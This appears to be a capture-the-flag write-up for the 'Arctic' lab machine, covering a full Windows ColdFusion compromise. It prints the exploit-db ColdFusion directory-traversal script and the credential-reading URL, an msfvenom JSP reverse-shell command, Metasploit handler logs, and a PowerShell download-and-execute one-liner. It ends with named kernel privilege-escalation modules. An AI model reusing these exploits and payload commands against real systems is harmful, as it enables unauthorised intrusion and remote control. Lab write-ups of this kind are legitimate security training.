10.10.10.11 - Arctic - LFI, Win2008 Priv Esc
ColdFusion JSP Shell Upload/MS10-092/MS16-014
Summary:
vulnerable software : CFIDE, POC system vulnerable : 10.10.10.11:8500 vulnerability explanation :Adobe ColdFusion Unspecified Directory Traversal Vulnerability severity : critical
Enumeration:
Command run:
nmap 10.10.10.11 -sV -sC
1
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-30 07:47 GMT
2
Nmap scan report for 10.10.10.11
3
Host is up (0.12s latency).
4
Not shown: 997 filtered ports
5
PORT STATE SERVICE VERSION
6
135/tcp open msrpc Microsoft Windows RPC
7
8500/tcp open fmtp?
8
49154/tcp open msrpc Microsoft Windows RPC
9
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Copied!
Directories Enumeration:
Adobe ColdFusion Version 8 administrative panel at http://10.10.10.11:8500/CFIDE/administrator/.
Details of Adobe ColdFusion - Directory Traversal, 14641.py.
1
└──╼ $cat /usr/share/exploitdb/exploits/multiple/remote/14641.py
2
# Working GET request courtesy of carnal0wnage:
3
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
4
#
5
# LLsecurity added another admin page filename: "/CFIDE/administrator/enter.cfm"
6
7
8
#!/usr/bin/python
9
10
# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
11
# detailed information about the exploitation of this vulnerability:
12
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
13
14
# leo 13.08.2010
15
16
import sys
17
import socket
18
import re
19
20
# in case some directories are blocked
21
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", "/cfide/install.cfm", "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/enter.cfm")
22
23
post = """POST %s HTTP/1.1
24
Host: %s
25
Connection: close
26
Content-Type: application/x-www-form-urlencoded
27
Content-Length: %d
28
29
locale=%%00%s%%00a"""
30
31
def main():
32
if len(sys.argv) != 4:
33
print "usage: %s <host> <port> <file_path>" % sys.argv[0]
34
print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]
35
print "if successful, the file will be printed"
36
return
37
38
host = sys.argv[1]
39
port = sys.argv[2]
40
path = sys.argv[3]
41
42
for f in filenames:
43
print "------------------------------"
44
print "trying", f
45
46
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
47
s.connect((host, int(port)))
48
s.send(post % (f, host, len(path) + 14, path))
49
50
buf = ""
51
while 1:
52
buf_s = s.recv(1024)
53
if len(buf_s) == 0:
54
break
55
buf += buf_s
56
57
m = re.search('<title>(.*)</title>', buf, re.S)
58
if m != None:
59
title = m.groups(0)[0]
60
print "title from server in %s:" % f
61
print "------------------------------"
62
print m.groups(0)[0]
63
print "------------------------------"
64
65
if __name__ == '__main__':
Copied!
We use LFI Vulnerability in http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en to retrieve the credentials:
Thanks to LFI vulnerability we managed to extract the hashed password and username to the login panel:
Password hash 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 is happyday.
Once logged in, locate schedule task and add the following routine:
File path is: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp
Shell built with:
1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444-f raw > shell.jsp
Copied!
Upon execution of http://10.10.10.11:8500/CFIDE/shell.jsp, we get a reverse shell:
User flag:
1
C:\Users\tolis\Desktop>more user.txt
2
more user.txt
3
02650d3a69a70780c302e146a6cb96f3
4
Copied!
Alternatively we can catch out reverse shell with a meterpreter:
1
msf5 exploit(multi/handler) > options
2
3
Module options (exploit/multi/handler):
4
5
Name Current Setting Required Description
6
---- --------------- -------- -----------
7
8
9
Payload options (java/jsp_shell_reverse_tcp):
10
11
Name Current Setting Required Description
12
---- --------------- -------- -----------
13
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
14
LPORT 4444 yes The listen port
15
SHELL no The system shell to use.
16
17
18
Exploit target:
19
20
Id Name
21
-- ----
22
0 Wildcard Target
23
24
25
msf5 exploit(multi/handler) > run -j
26
[*] Exploit running as background job 0.
27
[*] Exploit completed, but no session was created.
28
29
[*] Started reverse TCP handler on 10.10.14.20:4444
30
msf5 exploit(multi/handler) > jobs
31
32
Jobs
33
====
34
35
Id Name Payload Payload opts
36
-- ---- ------- ------------
37
0 Exploit: multi/handler java/jsp_shell_reverse_tcp tcp://10.10.14.20:4444
38
39
msf5 exploit(multi/handler) > [*] Command shell session 1 opened (10.10.14.20:4444 -> 10.10.10.11:49483) at 2019-01-31 02:22:25 +0000
40
Copied!
Our current payload does not contain meterpreter, we can correct that with a web_delivery module:
1
msf5 exploit(multi/script/web_delivery) > options
2
3
Module options (exploit/multi/script/web_delivery):
4
5
Name Current Setting Required Description
6
---- --------------- -------- -----------
7
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
8
SRVPORT 8080 yes The local port to listen on.
9
SSL false no Negotiate SSL for incoming connections
10
SSLCert no Path to a custom SSL certificate (default is randomly generated)
11
URIPATH no The URI to use for this exploit (default is random)
12
13
14
Payload options (windows/x64/meterpreter/reverse_tcp):
15
16
Name Current Setting Required Description
17
---- --------------- -------- -----------
18
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
19
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
20
LPORT 4455 yes The listen port
21
22
23
Exploit target:
24
25
Id Name
26
-- ----
27
2 PSH
28
29
30
msf5 exploit(multi/script/web_delivery) > run
31
[*] Exploit running as background job 2.
32
[*] Exploit completed, but no session was created.
33
34
[*] Started reverse TCP handler on 10.10.14.20:4455
35
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/YVCJiGqyEy7pQbC
36
[*] Local IP: http://10.8.234.17:8080/YVCJiGqyEy7pQbC
37
[*] Server started.
38
[*] Run the following command on the target machine:
39
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://10.10.14.20:8080/YVCJiGqyEy7pQbC');
40
[*] 10.10.10.11 web_delivery - Delivering Payload
41
[*] Sending stage (206403 bytes) to 10.10.10.11
42
[*] Meterpreter session 2 opened (10.10.14.20:4455 -> 10.10.10.11:49582) at 2019-01-31 02:35:36 +0000
43
44
msf5 exploit(multi/script/web_delivery) > sessions
45
46
Active sessions
47
===============
48
49
Id Name Type Information Connection
50
-- ---- ---- ----------- ----------
51
1 shell java/linux Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation... 10.10.14.20:4444 -> 10.10.10.11:49560 (10.10.10.11)
52
2 meterpreter x64/windows ARCTIC\tolis @ ARCTIC
Copied!
Privilege Escalation:
We try the first exploit on the list and ms10_092_schelevator works beautifully on 10.10.10.11.
Note to self: research how recent CVE-2018-8440 can be used to exploit this and other versions of Windows.
Alternatively use:
ms16_014_wmi_recv-notif
Both exploits are providing administrative access to this Windows 2008 machine:
Copy link